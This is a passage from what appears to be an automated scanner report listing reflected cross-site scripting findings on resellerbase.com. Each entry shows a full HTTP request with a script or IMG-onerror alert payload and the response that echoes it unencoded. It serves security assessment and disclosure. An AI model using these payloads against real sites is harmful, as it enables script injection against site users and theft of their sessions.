Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag3e111<script>alert(1)</script>62c9d4d91768b83c4/software?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4416. http://www.resellerbase.com/tag/software [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/software

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 48654<script>alert(1)</script>39ae5c9e4f0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag48654<script>alert(1)</script>39ae5c9e4f0/software HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:57:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag48654<script>alert(1)</script>39ae5c9e4f0/software was not found on this server.</p>
...[SNIP]...

2.4417. http://www.resellerbase.com/tag/software [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/software

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c4d8e<img%20src%3da%20onerror%3dalert(1)>d4852d1bf8ccf59b5 was submitted in the REST URL parameter 2. This input was echoed as c4d8e<img src=a onerror=alert(1)>d4852d1bf8ccf59b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /tag/softwarec4d8e<img%20src%3da%20onerror%3dalert(1)>d4852d1bf8ccf59b5?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/software
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: softw
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : softwarec4d8e<img src=a onerror=alert(1)>d4852d1bf8ccf59b5]</td>
...[SNIP]...

2.4418. http://www.resellerbase.com/tag/software [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/software

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 185d2</title><img%20src%3da%20onerror%3dalert(1)>e4c64d673c2206548 was submitted in the REST URL parameter 2. This input was echoed as 185d2</title><img src=a onerror=alert(1)>e4c64d673c2206548 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /tag/software185d2</title><img%20src%3da%20onerror%3dalert(1)>e4c64d673c2206548?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/software
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9822

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: software185d2</title><img src=a onerror=alert(1)>e4c64d673c2206548</title>
...[SNIP]...

2.4419. http://www.resellerbase.com/tag/software [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/software

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 518ce<img%20src%3da%20onerror%3dalert(1)>0fb2302f70e was submitted in the REST URL parameter 2. This input was echoed as 518ce<img src=a onerror=alert(1)>0fb2302f70e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/software518ce<img%20src%3da%20onerror%3dalert(1)>0fb2302f70e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: softw
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : software518ce<img src=a onerror=alert(1)>0fb2302f70e]</td>
...[SNIP]...

2.4420. http://www.resellerbase.com/tag/software [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/software

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload d268b</title><img%20src%3da%20onerror%3dalert(1)>368004f9793 was submitted in the REST URL parameter 2. This input was echoed as d268b</title><img src=a onerror=alert(1)>368004f9793 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/softwared268b</title><img%20src%3da%20onerror%3dalert(1)>368004f9793 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: softwared268b</title><img src=a onerror=alert(1)>368004f9793</title>
...[SNIP]...

2.4421. http://www.resellerbase.com/tag/ssl+certificates [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/ssl+certificates

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3022e<script>alert(1)</script>1d8d657470a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The reflection is in the site's 404 error page, which echoes the requested URL into the response body without HTML encoding, so the injected SCRIPT element is parsed and executed as-is.

Request

GET /tag3022e<script>alert(1)</script>1d8d657470a/ssl+certificates HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag3022e<script>alert(1)</script>1d8d657470a/ssl+certificates was not found on this server.</p>
...[SNIP]...

2.4422. http://www.resellerbase.com/tag/survey [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/survey

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload db791<script>alert(1)</script>4695bc771d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The reflection is in the site's 404 error page, which echoes the requested URL into the response body without HTML encoding, so the injected SCRIPT element is parsed and executed as-is.

Request

GET /tagdb791<script>alert(1)</script>4695bc771d2/survey HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagdb791<script>alert(1)</script>4695bc771d2/survey was not found on this server.</p>
...[SNIP]...

2.4423. http://www.resellerbase.com/tag/tag/adult/more2.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/tag/adult/more2.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0bb0"><script>alert(1)</script>b16b1aadbc9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The payload closes the double-quoted href value and the A start tag with "> and then opens a SCRIPT element, which executes as the page renders.

Request

GET /tagf0bb0"><script>alert(1)</script>b16b1aadbc9/tag/adult/more2.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 44026

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/tagf0bb0"><script>alert(1)</script>b16b1aadbc9/tag/adult/" style="color: ">
...[SNIP]...

2.4424. http://www.resellerbase.com/tag/tag/adult/more2.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/tag/adult/more2.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1b3c5<img%20src%3da%20onerror%3dalert(1)>20e97a918e7 was submitted in the REST URL parameter 2. This input was echoed as 1b3c5<img src=a onerror=alert(1)>20e97a918e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses an IMG event handler: because the image source does not load, onerror fires and runs the script as soon as the page renders, without any user interaction.

Request

GET /tag/tag1b3c5<img%20src%3da%20onerror%3dalert(1)>20e97a918e7/adult/more2.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:56:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: tag1b
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : tag1b3c5<img src=a onerror=alert(1)>20e97a918e7/adult]</td>
...[SNIP]...

2.4425. http://www.resellerbase.com/tag/tag/adult/more2.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/tag/adult/more2.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 113f1</title><img%20src%3da%20onerror%3dalert(1)>3a0a96bbae4 was submitted in the REST URL parameter 2. This input was echoed as 113f1</title><img src=a onerror=alert(1)>3a0a96bbae4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Browsers treat the content of the TITLE element as raw text rather than markup, so the payload first closes the element with </title> and then uses an IMG event handler (onerror fires because the image source does not load) to execute script without any user interaction.

Request

GET /tag/tag113f1</title><img%20src%3da%20onerror%3dalert(1)>3a0a96bbae4/adult/more2.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:56:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: tag113f1</title><img src=a onerror=alert(1)>3a0a96bbae4/adult</title>
...[SNIP]...

2.4426. http://www.resellerbase.com/tag/tag/adult/more2.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/tag/adult/more2.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload b7b47</title><img%20src%3da%20onerror%3dalert(1)>2d6a0a61370 was submitted in the REST URL parameter 3. This input was echoed as b7b47</title><img src=a onerror=alert(1)>2d6a0a61370 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Browsers treat the content of the TITLE element as raw text rather than markup, so the payload first closes the element with </title> and then uses an IMG event handler (onerror fires because the image source does not load) to execute script without any user interaction.

Request

GET /tag/tag/adultb7b47</title><img%20src%3da%20onerror%3dalert(1)>2d6a0a61370/more2.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:56:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: tag/adultb7b47</title><img src=a onerror=alert(1)>2d6a0a61370</title>
...[SNIP]...

2.4427. http://www.resellerbase.com/tag/tag/adult/more2.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/tag/adult/more2.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dbc11<img%20src%3da%20onerror%3dalert(1)>0f8a21275c1 was submitted in the REST URL parameter 3. This input was echoed as dbc11<img src=a onerror=alert(1)>0f8a21275c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses an IMG event handler: because the image source does not load, onerror fires and runs the script as soon as the page renders, without any user interaction.

Request

GET /tag/tag/adultdbc11<img%20src%3da%20onerror%3dalert(1)>0f8a21275c1/more2.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:56:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: tag/a
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : tag/adultdbc11<img src=a onerror=alert(1)>0f8a21275c1]</td>
...[SNIP]...

2.4428. http://www.resellerbase.com/tag/tag/adult/more2.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/tag/adult/more2.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload e8fd2</title><img%20src%3da%20onerror%3dalert(1)>97650c9064a was submitted in the REST URL parameter 4. This input was echoed as e8fd2</title><img src=a onerror=alert(1)>97650c9064a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Browsers treat the content of the TITLE element as raw text rather than markup, so the payload first closes the element with </title> and then uses an IMG event handler (onerror fires because the image source does not load) to execute script without any user interaction.

Request

GET /tag/tag/adult/e8fd2</title><img%20src%3da%20onerror%3dalert(1)>97650c9064a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:57:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: tag/adult/e8fd2</title><img src=a onerror=alert(1)>97650c9064a</title>
...[SNIP]...

2.4429. http://www.resellerbase.com/tag/tag/adult/more2.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/tag/adult/more2.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5b8f9<img%20src%3da%20onerror%3dalert(1)>b04b54dd823 was submitted in the REST URL parameter 4. This input was echoed as 5b8f9<img src=a onerror=alert(1)>b04b54dd823 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses an IMG event handler: because the image source does not load, onerror fires and runs the script as soon as the page renders, without any user interaction.

Request

GET /tag/tag/adult/5b8f9<img%20src%3da%20onerror%3dalert(1)>b04b54dd823 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:56:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: tag/a
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : tag/adult/5b8f9<img src=a onerror=alert(1)>b04b54dd823]</td>
...[SNIP]...

2.4430. http://www.resellerbase.com/tag/telephone [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/telephone

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 51ba4<script>alert(1)</script>b6e3ddcb59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The reflection is in the site's 404 error page, which echoes the requested URL into the response body without HTML encoding, so the injected SCRIPT element is parsed and executed as-is.

Request

GET /tag51ba4<script>alert(1)</script>b6e3ddcb59/telephone HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag51ba4<script>alert(1)</script>b6e3ddcb59/telephone was not found on this server.</p>
...[SNIP]...

2.4431. http://www.resellerbase.com/tag/telephone [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/telephone

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2337d<script>alert(1)</script>032fdf081353ffd98 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The reflection is in the site's 404 error page, which echoes the requested URL (here including the query string) into the response body without HTML encoding, so the injected SCRIPT element is parsed and executed as-is.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; it was possible to convert it to a GET request, which makes the attack easier to demonstrate and to deliver.

Request

GET /tag2337d<script>alert(1)</script>032fdf081353ffd98/telephone?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/telephone
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag2337d<script>alert(1)</script>032fdf081353ffd98/telephone?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4432. http://www.resellerbase.com/tag/telephone [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/telephone

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ce5fe<img%20src%3da%20onerror%3dalert(1)>dd6e6c23a78 was submitted in the REST URL parameter 2. This input was echoed as ce5fe<img src=a onerror=alert(1)>dd6e6c23a78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses an IMG event handler: because the image source does not load, onerror fires and runs the script as soon as the page renders, without any user interaction.

Request

GET /tag/telephonece5fe<img%20src%3da%20onerror%3dalert(1)>dd6e6c23a78 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: telep
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : telephonece5fe<img src=a onerror=alert(1)>dd6e6c23a78]</td>
...[SNIP]...

2.4433. http://www.resellerbase.com/tag/telephone [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/telephone

Issue detail

